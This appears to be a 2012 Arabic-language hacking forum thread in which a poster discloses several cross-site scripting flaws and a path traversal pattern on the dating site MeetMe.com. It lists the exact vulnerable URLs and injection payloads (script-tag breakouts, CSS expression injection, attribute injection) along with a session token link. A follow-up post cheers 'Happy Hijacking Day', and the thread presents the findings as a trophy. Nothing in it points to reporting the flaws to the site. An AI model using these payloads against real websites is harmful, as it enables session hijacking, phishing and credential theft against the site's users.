النتائج 1 إلى 3 من 3

الموضوع: Multiple vulnerability On MeetMe

Vulnerability Details XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking

  1. 10-31-2012, 03:37 PM #1
    Anti-Trust
    Anti-Trust غير متواجد حالياً
    Founder الصورة الرمزية Anti-Trust
    تاريخ التسجيل
    Jun 2012
    المشاركات
    573
    معدل تقييم المستوى
    10

    Multiple vulnerability On MeetMe


    Multiple vulnerability On MeetMe 518196718.png



    Vulnerability Details



    XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser



    Impact



    There are many different attacks that can be leveraged through the use of XSS, including


    Hi-jacking users active session
    Changing the look of the page within the victims browser
    Mounting a successful phishing attack
    Intercept data and perform man-in-the-middle attacks
    Internal Path Leakage by Sending Error Messages to The Server




    Vulnerability Type


    multiple Cross Site Script on Meetme.com

    PATH

    كود PHP:
    Meetme.com/ajax/iframe_ads.php?slot_name

    Payload

    كود PHP:
    ' stYle='x:expre/**/ssion(alert(9)) 

    PATH


    كود PHP:
     http://www.meetme.com/apps/www/ 

    PAYLOAD

    كود PHP:
    '"--></style></script><script>alert("Pwned By Anti-Trust")</script> 

    PATH


    كود PHP:
    http://www.meetme.com/apps/www/terms 
    PAYLOAD

    كود PHP:
    '"--></style></script><script>alert("Pwned By Anti-Trust")</script> 


    PATH

    كود PHP:
    http://www.meetme.com/apps/www/gifts/premium 


    PAYLOAD

    كود PHP:
    '"--></style></script><script>alert("Pwned By Anti-Trust")</script> 

    PATH

    كود PHP:
    http://www.meetme.com/apps/www/gifts/ 


    PAYLOAD

    كود PHP:
    '"--></style></script><script>alert("Pwned By Anti-Trust")</script> 

    PATH


    كود PHP:
    http://www.meetme.com/ajax/ajax_dropdown.php?type= 

    PAYLOAD

    كود PHP:
    "><NINJA-SECURITY=alert(0x31337)>&id=3&div=state_input&width=140px&child=3 

    PATH


    كود PHP:
    http://www.meetme.com/ajax/ajax_dropdown.php?type=s_state&id=3&div= 

    PAYLOAD

    كود PHP:
    "><NINJA-SECURITY=alert(0x31337)>&id=3&div=state_input&width=140px&child=3 

    Example PATH Leakage On Meetme.com

    Session Token

    كود PHP:
    http://www.meetme.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZjaGV  ja2xvZ2luPTE= 


    Parameter Name s_zip
    Parameter Type Post
    Attack Pattern ../../../../../../../../../../proc/self/fd/2.php
    Multiple vulnerability On MeetMe 0c62dcc4d7.png




    DEMO



    المصدر: NINJA SECURITY

    Multiple vulnerability On MeetMe meetme multiple








    رد مع اقتباس رد مع اقتباس
  2. 10-31-2012, 04:29 PM #2
    Anti-Trust
    Anti-Trust غير متواجد حالياً
    Founder الصورة الرمزية Anti-Trust
    تاريخ التسجيل
    Jun 2012
    المشاركات
    573
    معدل تقييم المستوى
    10


    Happy Hijacking Day







    رد مع اقتباس رد مع اقتباس
  3. 11-02-2012, 09:23 PM #3
    Ali
    Guest
    XXS exists even in big website sucj as YHAOO , HOTMAIL and whmcs and who understand the core of XXS is the one who can use the full power od xxs
    رد مع اقتباس رد مع اقتباس
 

 
« الموضوع السابق | الموضوع التالي »

الكلمات الدلالية لهذا الموضوع

Bookmarks

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

قوانين المنتدى

RSS RSS 2.0 XML MAP HTML


NINJA SECURITY All Rights Reserved © 2009-2013

SEO by vBSEO 3.6.0 RC 2